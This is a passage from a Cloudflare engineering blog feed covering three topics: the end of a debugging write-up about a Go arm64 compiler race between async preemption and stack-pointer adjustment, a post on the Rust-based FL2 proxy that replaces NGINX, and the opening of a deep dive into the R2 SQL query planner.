MOVD $32776, R27
ADD R27, RSP, R29
MOVD $32784, R27
ADD R27, RSP, RSP
RET
</code></pre>
            <p></p><p>With a stack of <code>1&lt;&lt;16</code>:</p>
            <pre><code>; //go:noinline
; func big_stack() byte {
; 	var big_stack = make([]byte, 1&lt;&lt;16)
; 	return big_stack[0]
; } 
ADD $8, RSP, R29
ADD $(16&lt;&lt;12), R29, R29
ADD $16, RSP, RSP
ADD $(16&lt;&lt;12), RSP, RSP
RET
</code></pre>
            <p>In the larger stack case, there is a point between <code>ADD x, RSP, RSP</code> opcodes where the stack pointer is not pointing to the tip of a stack frame. We thought at first that this was a matter of memory corruption – that in handling async preemption the runtime would push a function call on the stack and corrupt the middle of the stack. However, this goroutine is already in the function epilogue – any data we corrupt is actively in the process of being thrown away. What's the issue then?  </p><p>The Go runtime often needs to <b>unwind</b> the stack, which means walking backwards through the chain of function calls. For example: garbage collection uses it to find live references on the stack, panicking relies on it to evaluate <code>defer</code> functions, and generating stack traces needs to print the call stack. For this to work the stack pointer <b>must be accurate during unwinding</b> because of how golang dereferences sp to determine the calling function. If the stack pointer is partially modified, the unwinder will look for the calling function in the middle of the stack. The underlying data is meaningless when interpreted as directions to a parent stack frame and then the runtime will likely crash. </p>
            <pre><code>//https://github.com/golang/go/blob/66536242fce34787230c42078a7bbd373ef8dcb0/src/runtime/traceback.go#L373

if innermost &amp;&amp; frame.sp &lt; frame.fp || frame.lr == 0 {
    lrPtr = frame.sp
    frame.lr = *(*uintptr)(unsafe.Pointer(lrPtr))
}
</code></pre>
            <p></p><p>When async preemption happens it will push a function call onto the stack but the parent stack frame is no longer correct because sp was only partially adjusted when the preemption happened. The crash flow looks something like this:  </p><ol><li><p>Async preemption happens between the two opcodes that <code>add x, rsp</code> expands to</p></li><li><p>Garbage collection triggers stack unwinding (to check for heap object liveness)</p></li><li><p>The unwinder starts traversing the stack of the problematic goroutine and correctly unwinds up to the problematic function</p></li><li><p>The unwinder dereferences <code>sp</code> to determine the parent function</p></li><li><p>Almost certainly the data behind <code>sp</code> is not a function</p></li><li><p>Crash</p></li></ol>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5LKOBC6lQzuKvwy0vyEfk2/054c9aaedc14d155294a682f7de3a610/BLOG-2906_3.png" />
          </figure><p>We saw earlier a faulting stack trace which ended in <code>(*NetlinkSocket).Receive</code> – in this case stack unwinding faulted while it was trying to determine the parent frame.    </p>
            <pre><code>goroutine 90 gp=0x40042cc000 m=nil [preempted (scan)]:
runtime.asyncPreempt2()
/usr/local/go/src/runtime/preempt.go:306 +0x2c fp=0x40060a25d0 sp=0x40060a25b0 pc=0x55557e299dec
runtime.asyncPreempt()
/usr/local/go/src/runtime/preempt_arm64.s:47 +0x9c fp=0x40060a27c0 sp=0x40060a25d0 pc=0x55557e2dc94c
github.com/vishvananda/netlink/nl.(*NetlinkSocket).Receive(0xff48ce6e060b2848?)
/vendor/github.com/vishvananda/netlink/nl/nl_linux.go:779 +0x130 fp=0x40060b2820 sp=0x40060a27d0 pc=0x55557e9d2880
</code></pre>
            <p></p><p>Once we discovered the root cause we reported it with a reproducer and the bug was quickly fixed. This bug is fixed in <a href="https://github.com/golang/go/commit/e8794e650e05fad07a33fb6e3266a9e677d13fa8"><u>go1.23.12</u></a>, <a href="https://github.com/golang/go/commit/6e1c4529e4e00ab58572deceab74cc4057e6f0b6"><u>go1.24.6</u></a>, and <a href="https://github.com/golang/go/commit/f7cc61e7d7f77521e073137c6045ba73f66ef902"><u>go1.25.0</u></a>. Previously, the go compiler emitted a single <code>add x, rsp</code> instruction and relied on the assembler to split immediates into multiple opcodes as necessary. After this change, stacks larger than 1&lt;&lt;12 will build the offset in a temporary register and then add that to <code>rsp</code> in a single, indivisible opcode. A goroutine can be preempted before or after the stack pointer modification, but never during. This means that the stack pointer is always valid and there is no race condition.</p>
            <pre><code>LDP -8(RSP), (R29, R30)
MOVD $32, R27
MOVK $(1&lt;&lt;16), R27
ADD R27, RSP, RSP
RET</code></pre>
            <p></p><p>This was a very fun problem to debug. We don’t often see bugs where you can accurately blame the compiler. Debugging it took weeks and we had to learn about areas of the Go runtime that people don’t usually need to think about. It’s a nice example of a rare race condition, the sort of bug that can only really be quantified at a large scale.</p><p>We’re always looking for people who enjoy this kind of detective work. <a href="https://www.cloudflare.com/careers/jobs/?department=Engineering"><u>Our engineering teams are hiring</u></a>.   </p> ]]></content:encoded>
            <category><![CDATA[Deep Dive]]></category>
            <category><![CDATA[Go]]></category>
            <category><![CDATA[Programming]]></category>
            <guid isPermaLink="false">12E3V053vhNrZrU5I2AAV1</guid>
            <dc:creator>Thea Heinen</dc:creator>
        </item>
        <item>
            <title><![CDATA[Cloudflare just got faster and more secure, powered by Rust]]></title>
            <link>https://blog.cloudflare.com/20-percent-internet-upgrade/</link>
            <pubDate>Fri, 26 Sep 2025 14:00:00 GMT</pubDate>
            <description><![CDATA[ We’ve replaced the original core system in Cloudflare with a new modular Rust-based proxy, replacing NGINX.  ]]></description>
            <content:encoded><![CDATA[ <p>Cloudflare is relentless about building and running the world’s fastest network. We have been <a href="https://blog.cloudflare.com/tag/network-performance-update/"><u>tracking and reporting on our network performance since 2021</u></a>: you can see the latest update <a href="https://blog.cloudflare.com/tag/network-performance-update/"><u>here</u></a>.</p><p>Building the fastest network requires work in many areas. We invest a lot of time in our hardware, to have efficient and fast machines. We invest in peering arrangements, to make sure we can talk to every part of the Internet with minimal delay. On top of this, we also have to invest in the software we run our network on, especially as each new product can otherwise add more processing delay.</p><p>No matter how fast messages arrive, we introduce a bottleneck if that software takes too long to think about how to process and respond to requests. Today we are excited to share a significant upgrade to our software that cuts the median time we take to respond by 10ms and delivers a 25% performance boost, as measured by third-party CDN performance tests.</p><p>We've spent the last year rebuilding major components of our system, and we've just slashed the latency of traffic passing through our network for millions of our customers. At the same time, we've made our system more secure, and we've reduced the time it takes for us to build and release new products. </p>
    <div>
      <h2>Where did we start?</h2>
      <a href="#where-did-we-start">
        
      </a>
    </div>
    <p>Every request that hits Cloudflare starts a journey through our network. It might come from a browser loading a webpage, a mobile app calling an API, or automated traffic from another service. These requests first terminate at our HTTP and TLS layer, then pass into a system we call FL, and finally through <a href="https://blog.cloudflare.com/pingora-open-source/"><u>Pingora</u></a>, which performs cache lookups or fetches data from the origin if needed.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/CKW3jrB9vw4UhXx6OYJpt/928b9e9c1c794f7622fc4ad469d66b60/image3.png" />
          </figure><p>FL is the brain of Cloudflare. Once a request reaches FL, we then run the various security and performance features in our network. It applies each customer’s unique configuration and settings, from enforcing <a href="https://developers.cloudflare.com/waf/managed-rules/"><u>WAF rules </u></a>and <a href="https://www.cloudflare.com/ddos/"><u>DDoS protection</u></a> to routing traffic to the <a href="https://developers.cloudflare.com/learning-paths/workers/devplat/intro-to-devplat/"><u>Developer Platform </u></a>and <a href="https://developers.cloudflare.com/r2/"><u>R2</u></a>. </p><p>Built more than 15 years ago, FL has been at the core of Cloudflare’s network. It enables us to deliver a broad range of features, but over time that flexibility became a challenge. As we added more products, FL grew harder to maintain, slower to process requests, and more difficult to extend. Each new feature required careful checks across existing logic, and every addition introduced a little more latency, making it increasingly difficult to sustain the performance we wanted.</p><p>You can see how FL is key to our system — we’ve often called it the “brain” of Cloudflare. It’s also one of the oldest parts of our system: the first commit to the codebase was made by one of our founders, Lee Holloway, well before our initial launch. We’re celebrating our 15th Birthday this week - this system started 9 months before that!</p>
            <pre><code>commit 39c72e5edc1f05ae4c04929eda4e4d125f86c5ce
Author: Lee Holloway &lt;q@t60.(none)&gt;
Date:   Wed Jan 6 09:57:55 2010 -0800

    nginx-fl initial configuration</code></pre>
            <p>As the commit implies, the first version of FL was implemented based on the NGINX webserver, with product logic implemented in PHP.  After 3 years, the system became too complex to manage effectively, and too slow to respond, and an almost complete rewrite of the running system was performed. This led to another significant commit, this time made by Dane Knecht, who is now our CTO.</p>
            <pre><code>commit bedf6e7080391683e46ab698aacdfa9b3126a75f
Author: Dane Knecht
Date:   Thu Sep 19 19:31:15 2013 -0700

    remove PHP.</code></pre>
            <p>From this point on, FL was implemented using NGINX, the <a href="https://openresty.org/en/"><u>OpenResty</u></a> framework, and <a href="https://luajit.org/"><u>LuaJIT</u></a>.  While this was great for a long time, over the last few years it started to show its age. We had to spend increasing amounts of time fixing or working around obscure bugs in LuaJIT. The highly dynamic and unstructured nature of our Lua code, which was a blessing when first trying to implement logic quickly, became a source of errors and delay when trying to integrate large amounts of complex product logic. Each time a new product was introduced, we had to go through all the other existing products to check if they might be affected by the new logic.</p><p>It was clear that we needed a rethink. So, in July 2024, we cut an initial commit for a brand new, and radically different, implementation. To save time agreeing on a new name for this, we just called it “FL2”, and started, of course, referring to the original FL as “FL1”.</p>
            <pre><code>commit a72698fc7404a353a09a3b20ab92797ab4744ea8
Author: Maciej Lechowski
Date:   Wed Jul 10 15:19:28 2024 +0100

    Create fl2 project</code></pre>
            
    <div>
      <h2>Rust and rigid modularization</h2>
      <a href="#rust-and-rigid-modularization">
        
      </a>
    </div>
    <p>We weren’t starting from scratch. We’ve <a href="https://blog.cloudflare.com/how-we-built-pingora-the-proxy-that-connects-cloudflare-to-the-internet/"><u>previously blogged</u></a> about how we replaced another one of our legacy systems with Pingora, which is built in the <a href="https://www.rust-lang.org/"><u>Rust</u></a> programming language, using the <a href="https://tokio.rs/"><u>Tokio</u></a> runtime. We’ve also <a href="https://blog.cloudflare.com/introducing-oxy/"><u>blogged about Oxy</u></a>, our internal framework for building proxies in Rust. We write a lot of Rust, and we’ve gotten pretty good at it.</p><p>We built FL2 in Rust, on Oxy, and built a strict module framework to structure all the logic in FL2.</p>
    <div>
      <h2>Why Oxy?</h2>
      <a href="#why-oxy">
        
      </a>
    </div>
    <p>When we set out to build FL2, we knew we weren’t just replacing an old system; we were rebuilding the foundations of Cloudflare. That meant we needed more than just a proxy; we needed a framework that could evolve with us, handle the immense scale of our network, and let teams move quickly without sacrificing safety or performance. </p><p>Oxy gives us a powerful combination of performance, safety, and flexibility. Built in Rust, it eliminates entire classes of bugs that plagued our Nginx/LuaJIT-based FL1, like memory safety issues and data races, while delivering C-level performance. At Cloudflare’s scale, those guarantees aren’t nice-to-haves, they’re essential. Every microsecond saved per request translates into tangible improvements in user experience, and every crash or edge case avoided keeps the Internet running smoothly. Rust’s strict compile-time guarantees also pair perfectly with FL2’s modular architecture, where we enforce clear contracts between product modules and their inputs and outputs.</p><p>But the choice wasn’t just about language. Oxy is the culmination of years of experience building high-performance proxies. It already powers several major Cloudflare services, from our <a href="https://developers.cloudflare.com/cloudflare-one/"><u>Zero Trust</u></a> Gateway to <a href="https://blog.cloudflare.com/icloud-private-relay/"><u>Apple’s iCloud Private Relay</u></a>, so we knew it could handle the diverse traffic patterns and protocol combinations that FL2 would see. Its extensibility model lets us intercept, analyze, and manipulate traffic from<a href="https://www.cloudflare.com/en-gb/learning/ddos/glossary/open-systems-interconnection-model-osi/"><u> layer 3 up to layer 7</u></a>, and even decapsulate and reprocess traffic at different layers. That flexibility is key to FL2’s design because it means we can treat everything from HTTP to raw IP traffic consistently and evolve the platform to support new protocols and features without rewriting fundamental pieces.</p><p>Oxy also comes with a rich set of built-in capabilities that previously required large amounts of bespoke code. Things like monitoring, soft reloads, dynamic configuration loading and swapping are all part of the framework. That lets product teams focus on the unique business logic of their module rather than reinventing the plumbing every time. This solid foundation means we can make changes with confidence, ship them quickly, and trust they’ll behave as expected once deployed.</p>
    <div>
      <h2>Smooth restarts - keeping the Internet flowing</h2>
      <a href="#smooth-restarts-keeping-the-internet-flowing">
        
      </a>
    </div>
    <p>One of the most impactful improvements Oxy brings is handling of restarts. Any software under continuous development and improvement will eventually need to be updated. In desktop software, this is easy: you close the program, install the update, and reopen it. On the web, things are much harder. Our software is in constant use and cannot simply stop. A dropped HTTP request can cause a page to fail to load, and a broken connection can kick you out of a video call. Reliability is not optional.</p><p>In FL1, upgrades meant restarts of the proxy process. Restarting a proxy meant terminating the process entirely, which immediately broke any active connections. That was particularly painful for long-lived connections such as WebSockets, streaming sessions, and real-time APIs. Even planned upgrades could cause user-visible interruptions, and unplanned restarts during incidents could be even worse.</p><p>Oxy changes that. It includes a built-in mechanism for <a href="https://blog.cloudflare.com/oxy-the-journey-of-graceful-restarts/"><u>graceful restarts</u></a> that lets us roll out new versions without dropping connections whenever possible. When a new instance of an Oxy-based service starts up, the old one stops accepting new connections but continues to serve existing ones, allowing those sessions to continue uninterrupted until they end naturally.</p><p>This means that if you have an ongoing WebSocket session when we deploy a new version, that session can continue uninterrupted until it ends naturally, rather than being torn down by the restart. Across Cloudflare’s fleet, deployments are orchestrated over several hours, so the aggregate rollout is smooth and nearly invisible to end users.</p><p>We take this a step further by using systemd socket activation. Instead of letting each proxy manage its own sockets, we let systemd create and own them. This decouples the lifetime of sockets from the lifetime of the Oxy application itself. If an Oxy process restarts or crashes, the sockets remain open and ready to accept new connections, which will be served as soon as the new process is running. That eliminates the “connection refused” errors that could happen during restarts in FL1 and improves overall availability during upgrades.</p><p>We also built our own coordination mechanisms in Rust to replace Go libraries like <a href="https://github.com/cloudflare/tableflip"><u>tableflip</u></a> with <a href="https://github.com/cloudflare/shellflip"><u>shellflip</u></a>. This uses a restart coordination socket that validates configuration, spawns new instances, and ensures the new version is healthy before the old one shuts down. This improves feedback loops and lets our automation tools detect and react to failures immediately, rather than relying on blind signal-based restarts.</p>
    <div>
      <h2>Composing FL2 from Modules</h2>
      <a href="#composing-fl2-from-modules">
        
      </a>
    </div>
    <p>To avoid the problems we had in FL1, we wanted a design where all interactions between product logic were explicit and easy to understand. </p><p>So, on top of the foundations provided by Oxy, we built a platform which separates all the logic built for our products into well-defined modules. After some experimentation and research, we designed a module system which enforces some strict rules:</p><ul><li><p>No IO (input or output) can be performed by the module.</p></li><li><p>The module provides a list of <b>phases</b>.</p></li><li><p>Phases are evaluated in a strictly defined order, which is the same for every request.</p></li><li><p>Each phase defines a set of inputs which the platform provides to it, and a set of outputs which it may emit.</p></li></ul><p>Here’s an example of what a module phase definition looks like:</p>
            <pre><code>Phase {
    name: phases::SERVE_ERROR_PAGE,
    request_types_enabled: PHASE_ENABLED_FOR_REQUEST_TYPE,
    inputs: vec![
        InputKind::IPInfo,
        InputKind::ModuleValue(
            MODULE_VALUE_CUSTOM_ERRORS_FETCH_WORKER_RESPONSE.as_str(),
        ),
        InputKind::ModuleValue(MODULE_VALUE_ORIGINAL_SERVE_RESPONSE.as_str()),
        InputKind::ModuleValue(MODULE_VALUE_RULESETS_CUSTOM_ERRORS_OUTPUT.as_str()),
        InputKind::ModuleValue(MODULE_VALUE_RULESETS_UPSTREAM_ERROR_DETAILS.as_str()),
        InputKind::RayId,
        InputKind::StatusCode,
        InputKind::Visitor,
    ],
    outputs: vec![OutputValue::ServeResponse],
    filters: vec![],
    func: phase_serve_error_page::callback,
}</code></pre>
            <p>This phase is for our custom error page product.  It takes a few things as input — information about the IP of the visitor, some header and other HTTP information, and some “module values.” Module values allow one module to pass information to another, and they’re key to making the strict properties of the module system workable. For example, this module needs some information that is produced by the output of our rulesets-based custom errors product (the “<code>MODULE_VALUE_RULESETS_CUSTOM_ERRORS_OUTPUT</code>” input). These input and output definitions are enforced at compile time.</p><p>While these rules are strict, we’ve found that we can implement all our product logic within this framework. The benefit of doing so is that we can immediately tell which other products might affect each other.</p>
    <div>
      <h2>How to replace a running system</h2>
      <a href="#how-to-replace-a-running-system">
        
      </a>
    </div>
    <p>Building a framework is one thing. Building all the product logic and getting it right, so that customers don’t notice anything other than a performance improvement, is another.</p><p>The FL code base supports 15 years of Cloudflare products, and it’s changing all the time. We couldn’t stop development. So, one of our first tasks was to find ways to make the migration easier and safer.</p>
    <div>
      <h3>Step 1 - Rust modules in OpenResty</h3>
      <a href="#step-1-rust-modules-in-openresty">
        
      </a>
    </div>
    <p>It’s a big enough distraction from shipping products to customers to rebuild product logic in Rust. Asking all our teams to maintain two versions of their product logic, and reimplement every change a second time until we finished our migration was too much.</p><p>So, we implemented a layer in our old NGINX and OpenResty based FL which allowed the new modules to be run. Instead of maintaining a parallel implementation, teams could implement their logic in Rust, and replace their old Lua logic with that, without waiting for the full replacement of the old system.</p><p>For example, here’s part of the implementation for the custom error page module phase defined earlier (we’ve cut out some of the more boring details, so this doesn’t quite compile as-written):</p>
            <pre><code>pub(crate) fn callback(_services: &amp;mut Services, input: &amp;Input&lt;'_&gt;) -&gt; Output {
    // Rulesets produced a response to serve - this can either come from a special
    // Cloudflare worker for serving custom errors, or be directly embedded in the rule.
    if let Some(rulesets_params) = input
        .get_module_value(MODULE_VALUE_RULESETS_CUSTOM_ERRORS_OUTPUT)
        .cloned()
    {
        // Select either the result from the special worker, or the parameters embedded
        // in the rule.
        let body = input
            .get_module_value(MODULE_VALUE_CUSTOM_ERRORS_FETCH_WORKER_RESPONSE)
            .and_then(|response| {
                handle_custom_errors_fetch_response("rulesets", response.to_owned())
            })
            .or(rulesets_params.body);

        // If we were able to load a body, serve it, otherwise let the next bit of logic
        // handle the response
        if let Some(body) = body {
            let final_body = replace_custom_error_tokens(input, &amp;body);

            // Increment a metric recording number of custom error pages served
            custom_pages::pages_served("rulesets").inc();

            // Return a phase output with one final action, causing an HTTP response to be served.
            return Output::from(TerminalAction::ServeResponse(ResponseAction::OriginError {
                rulesets_params.status,
                source: "rulesets http_custom_errors",
                headers: rulesets_params.headers,
                body: Some(Bytes::from(final_body)),
            }));
        }
    }
}</code></pre>
            <p>The internal logic in each module is quite cleanly separated from the handling of data, with very clear and explicit error handling encouraged by the design of the Rust language.</p><p>Many of our most actively developed modules were handled this way, allowing the teams to maintain their change velocity during our migration.</p>
    <div>
      <h3>Step 2 - Testing and automated rollouts</h3>
      <a href="#step-2-testing-and-automated-rollouts">
        
      </a>
    </div>
    
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6OElHIMjnkIQmsbx92ZOYc/545a26ba623a253ea1a5c6b13279301d/image4.png" />
          </figure><p>It’s essential to have a seriously powerful test framework to cover such a migration.  We built a system, internally named Flamingo, which allows us to run thousands of full end-to-end test requests concurrently against our production and pre-production systems. The same tests run against FL1 and FL2, giving us confidence that we’re not changing behaviours.</p><p>Whenever we deploy a change, that change is rolled out gradually across many stages, with increasing amounts of traffic. Each stage is automatically evaluated, and only passes when the full set of tests have been successfully run against it - as well as overall performance and resource usage metrics being within acceptable bounds. This system is fully automated, and pauses or rolls back changes if the tests fail.
</p><p>The benefit is that we’re able to build and ship new product features in FL2 within 48 hours - where it would have taken weeks in FL1. In fact, at least one of the announcements this week involved such a change!</p>
    <div>
      <h3>Step 3 - Fallbacks</h3>
      <a href="#step-3-fallbacks">
        
      </a>
    </div>
    <p>Over 100 engineers have worked on FL2, and we have over 130 modules. And we’re not quite done yet. We're still putting the final touches on the system, to make sure it replicates all the behaviours of FL1.</p><p>So how do we send traffic to FL2 without it being able to handle everything? If FL2 receives a request, or a piece of configuration for a request, that it doesn’t know how to handle, it gives up and does what we’ve called a <b>fallback</b> - it passes the whole thing over to FL1. It does this at the network level - it just passes the bytes on to FL1.</p><p>As well as making it possible for us to send traffic to FL2 without it being fully complete, this has another massive benefit. When we have implemented a piece of new functionality in FL2, but want to double check that it is working the same as in FL1, we can evaluate the functionality in FL2, and then trigger a fallback. We are able to compare the behaviour of the two systems, allowing us to get a high confidence that our implementation was correct.</p>
    <div>
      <h3>Step 4 - Rollout</h3>
      <a href="#step-4-rollout">
        
      </a>
    </div>
    <p>We started running customer traffic through FL2 early in 2025, and have been progressively increasing the amount of traffic served throughout the year. Essentially, we’ve been watching two graphs: one with the proportion of traffic routed to FL2 going up, and another with the proportion of traffic failing to be served by FL2 and falling back to FL1 going down.</p><p>We started this process by passing traffic for our free customers through the system. We were able to prove that the system worked correctly, and drive the fallback rates down for our major modules. Our <a href="https://community.cloudflare.com/"><u>Cloudflare Community</u></a> MVPs acted as an early warning system, smoke testing and flagging when they suspected the new platform might be the cause of a new reported problem. Crucially their support allowed our team to investigate quickly, apply targeted fixes, or confirm the move to FL2 was not to blame.</p><p>
We then advanced to our paying customers, gradually increasing the amount of customers using the system. We also worked closely with some of our largest customers, who wanted the performance benefits of FL2, and onboarded them early in exchange for lots of feedback on the system.</p><p>Right now, most of our customers are using FL2. We still have a few features to complete, and are not quite ready to onboard everyone, but our target is to turn off FL1 within a few more months.</p>
    <div>
      <h2>Impact of FL2</h2>
      <a href="#impact-of-fl2">
        
      </a>
    </div>
    <p>As we described at the start of this post, FL2 is substantially faster than FL1. The biggest reason for this is simply that FL2 performs less work. You might have noticed in the module definition example a line</p>
            <pre><code>    filters: vec![],</code></pre>
            <p>Every module is able to provide a set of filters, which control whether they run or not. This means that we don’t run logic for every product for every request — we can very easily select just the required set of modules. The incremental cost for each new product we develop has gone away.</p><p>Another huge reason for better performance is that FL2 is a single codebase, implemented in a performance focussed language. In comparison, FL1 was based on NGINX (which is written in C), combined with LuaJIT (Lua, and C interface layers), and also contained plenty of Rust modules.  In FL1, we spent a lot of time and memory converting data from the representation needed by one language, to the representation needed by another.</p><p>As a result, our internal measures show that FL2 uses less than half the CPU of FL1, and much less than half the memory. That’s a huge bonus — we can spend the CPU on delivering more and more features for our customers!</p>
    <div>
      <h2>How do we measure if we are getting better?</h2>
      <a href="#how-do-we-measure-if-we-are-getting-better">
        
      </a>
    </div>
    <p>Using our own tools and independent benchmarks like <a href="https://www.cdnperf.com/"><u>CDNPerf</u></a>, we measured the impact of FL2 as we rolled it out across the network. The results are clear: websites are responding 10 ms faster at the median, a 25% performance boost.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/eDqQvbAfrQoSXPZed0fd7/d7fe0d28e33a3f2e8dfcd27cf79c900f/image1.png" />
          </figure>
    <div>
      <h2>Security</h2>
      <a href="#security">
        
      </a>
    </div>
    <p>FL2 is also more secure by design than FL1. No software system is perfect, but the Rust language brings us huge benefits over LuaJIT. Rust has strong compile-time memory checks and a type system that avoids large classes of errors. Combine that with our rigid module system, and we can make most changes with high confidence.</p><p>Of course, no system is secure if used badly. It’s easy to write code in Rust, which causes memory corruption. To reduce risk, we maintain strong compile time linting and checking, together with strict coding standards, testing and review processes.</p><p>We have long followed a policy that any unexplained crash of our systems needs to be <a href="https://blog.cloudflare.com/however-improbable-the-story-of-a-processor-bug/"><u>investigated as a high priority</u></a>. We won’t be relaxing that policy, though the main cause of novel crashes in FL2 so far has been due to hardware failure. The massively reduced rates of such crashes will give us time to do a good job of such investigations.</p>
    <div>
      <h2>What’s next?</h2>
      <a href="#whats-next">
        
      </a>
    </div>
    <p>We’re spending the rest of 2025 completing the migration from FL1 to FL2, and will turn off FL1 in early 2026. We’re already seeing the benefits in terms of customer performance and speed of development, and we’re looking forward to giving these to all our customers.</p><p>We have one last service to completely migrate. The “HTTP &amp; TLS Termination” box from the diagram way back at the top is also an NGINX service, and we’re midway through a rewrite in Rust. We’re making good progress on this migration, and expect to complete it early next year.</p><p>After that, when everything is modular, in Rust and tested and scaled, we can really start to optimize! We’ll reorganize and simplify how the modules connect to each other, expand support for non-HTTP traffic like RPC and streams, and much more. </p><p>If you’re interested in being part of this journey, check out our <a href="https://www.cloudflare.com/careers/"><u>careers page</u></a> for open roles - we’re always looking for new talent to help us to help build a better Internet.</p><div>
  
</div><p></p> ]]></content:encoded>
            <category><![CDATA[Birthday Week]]></category>
            <category><![CDATA[Rust]]></category>
            <category><![CDATA[NGINX]]></category>
            <category><![CDATA[Deep Dive]]></category>
            <category><![CDATA[Engineering]]></category>
            <guid isPermaLink="false">7d41Nh5ZiG8DbEjjwhJF3H</guid>
            <dc:creator>Richard Boulton</dc:creator>
            <dc:creator>Steve Goldsmith</dc:creator>
            <dc:creator>Maurizio Abba</dc:creator>
            <dc:creator>Matthew Bullock</dc:creator>
        </item>
        <item>
            <title><![CDATA[R2 SQL: a deep dive into our new distributed query engine]]></title>
            <link>https://blog.cloudflare.com/r2-sql-deep-dive/</link>
            <pubDate>Thu, 25 Sep 2025 14:00:00 GMT</pubDate>
            <description><![CDATA[ R2 SQL provides a built-in, serverless way to run ad-hoc analytic queries against your R2 Data Catalog. This post dives deep under the Iceberg into how we built this distributed engine. ]]></description>
            <content:encoded><![CDATA[ <p>How do you run SQL queries over petabytes of data… without a server?</p><p>We have an answer for that: <a href="https://developers.cloudflare.com/r2-sql/"><u>R2 SQL</u></a>, a serverless query engine that can sift through enormous datasets and return results in seconds.</p><p>This post details the architecture and techniques that make this possible. We'll walk through our Query Planner, which uses <a href="https://developers.cloudflare.com/r2/data-catalog/"><u>R2 Data Catalog</u></a> to prune terabytes of data before reading a single byte, and explain how we distribute the work across Cloudflare’s <a href="https://www.cloudflare.com/network"><u>global network</u></a>, <a href="https://developers.cloudflare.com/workers/"><u>Workers</u></a> and <a href="https://www.cloudflare.com/developer-platform/products/r2/"><u>R2</u></a> for massively parallel execution.</p>
    <div>
      <h3>From catalog to query</h3>
      <a href="#from-catalog-to-query">
        
      </a>
    </div>
    <p>During Developer Week 2025, we <a href="https://blog.cloudflare.com/r2-data-catalog-public-beta/"><u>launched</u></a> R2 Data Catalog, a managed <a href="https://iceberg.apache.org/"><u>Apache Iceberg</u></a> catalog built directly into your Cloudflare R2 bucket. Iceberg is an open table format that provides critical database features like transactions and schema evolution for petabyte-scale <a href="https://www.cloudflare.com/learning/cloud/what-is-object-storage/">object storage</a>. It gives you a reliable catalog of your data, but it doesn’t provide a way to query it.</p><p>Until now, reading your R2 Data Catalog required setting up a separate service like <a href="https://spark.apache.org/"><u>Apache Spark</u></a> or <a href="https://trino.io/"><u>Trino</u></a>. Operating these engines at scale is not easy: you need to provision clusters, manage resource usage, and be responsible for their availability, none of which contributes to the primary goal of getting value from your data.</p><p><a href="https://developers.cloudflare.com/r2-sql/"><u>R2 SQL</u></a> removes that step entirely. It’s a serverless query engine that executes retrieval SQL queries against your Iceberg tables, right where your data lives.</p>
    <div>
      <h3>Designing a query engine for petabytes</h3>
      <a href="#designing-a-query-engine-for-petabytes">
        
      </a>
    </div>
    <p>Object storage is fundamentally different from a traditional database’s storage. A database is structured by design; R2 is an ocean of objects, where a single logical table can be composed of potentially millions of individual files, large and small, with more arriving every second.</p><p>Apache Iceberg provides a powerful layer of logical organization on top of this reality. It works by managing the table's state as an immutable series of snapshots, creating a reliable, structured view of the table by manipulating lightweight metadata files instead of rewriting the data files themselves.</p><p>However, this logical structure doesn't change the underlying physical challenge: an efficient query engine must still find the specific data it needs within that vast collection of files, and this requires overcoming two major technical hurdles:</p><p><b>The I/O problem</b>: A core challenge for query efficiency is minimizing the amount of data read from storage. A brute-force approach of reading every object is simply not viable. The primary goal is to read only the data that is absolutely necessary.</p><p><b>The Compute problem</b>: The amount of data that does need to be read can still be enormous. We need a way to give the right amount of compute power to a query, which might be massive, for just a few seconds, and then scale it down to zero instantly to avoid waste.</p><p>Our architecture for R2 SQL is designed to solve these two problems with a two-phase approach: a <b>Query Planner</b> that uses metadata to intelligently prune the search space, and a <b>Query Execution</b> system that distributes the work across Cloudflare's global network to process the data in parallel.</p>
    <div>
      <h2>Query Planner</h2>
      <a href="#query-planner">
        
      </a>
    </div>
    <p>The most efficient way to process data is to avoid reading it in the first place. This is the core strategy of the R2 SQL Query Planner. Instead of exhaustively scanning every file, the planner makes use of the metadata structure provided by R2 Data Catalog to prune the search space, that is, to avoid reading huge swathes of data irrelevant to a query.</p><p>This is a top-down investigation where the planner navigates the hierarchy of Iceberg metadata layers, using <b>stats</b> at each level to build a fast plan, specifying exactly which byte ranges the query engine needs to read.</p>
    <div>
      <h3>What do we mean by “stats”?</h3>
      <a href="#what-do-we-mean-by-stats">
        
      </a>
    </div>
    <p>When we say the planner uses "stats" we are referring to summary metadata that Iceberg stores about the contents of the data files. These statistics create a coarse map of the data, allowing the planner to make decisions about which files to read, and which to ignore, without opening them.</p><p>There are two primary levels of statistics the planner uses for pruning:</p><p><b>Partition-level stats</b>: Stored in the Iceberg manifest list, these stats describe the range of partition values for all the data in a given Iceberg manifest file. For a partition on <code>day(event_timestamp)</code>, this would be the earliest and latest day present in the files tracked by that manifest.</p><p><b>Column-level stats</b>: Stored in the manifest files, these are more granular stats about each individual data file. Data files in R2 Data Catalog are formatted using the <a href="https://parquet.apache.org/"><u>Apache Parquet</u></a>. For every column of a Parquet file, the manifest stores key information like:</p><ul><li><p>The minimum and maximum values. If a query asks for <code>http_status = 500</code>, and a file’s stats show its <code>http_status</code> column has a min of 200 and a max of 404, that entire file can be skipped.</p></li><li><p>A count of null values. This allows the planner to skip files when a query specifically looks for non-null values (e.g.,<code> WHERE error_code IS NOT NULL</code>) and the file's metadata reports that all values for <code>error_code</code> are null.</p></li></ul><p>Now, let's see how the planner uses these stats as it walks through the metadata layers.</p>
    <div>
      <h3>Pruning the search space</h3>
      <a href="#pruning-the-search-space">
        
      </a>
    </div>
